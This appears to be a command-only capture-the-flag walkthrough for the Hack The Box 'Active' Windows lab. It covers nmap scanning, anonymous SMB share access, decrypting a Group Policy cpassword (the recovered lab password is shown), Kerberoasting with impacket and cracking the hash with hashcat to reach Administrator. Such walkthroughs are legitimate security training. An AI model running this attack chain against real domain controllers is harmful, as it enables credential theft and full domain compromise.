Avatar Pwned machines

Active

Active


Created by Page Difficulty OS
eks & mrb3n Hack The Box Easy Windows

nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.100 -oG scan
/opt/extractports scan
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152,49153,49154,49155,49157,49158,49164,49173,49175 -Pn -sCV 10.10.10.100 -oN ports

image

netexec smb 10.10.10.100 -u '' -p '' --shares
smbclient \\\\10.10.10.100\\Replication -N

image

gpp-decrypt  edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

image

netexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --shares
smbclient \\\\10.10.10.100\\Users -U SVC_TGS

image

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
hashcat -m 13100 tgsAdministrator /usr/share/wordlists/rockyou.txt

image

smbclient \\\\10.10.10.100\\Users -U Administrator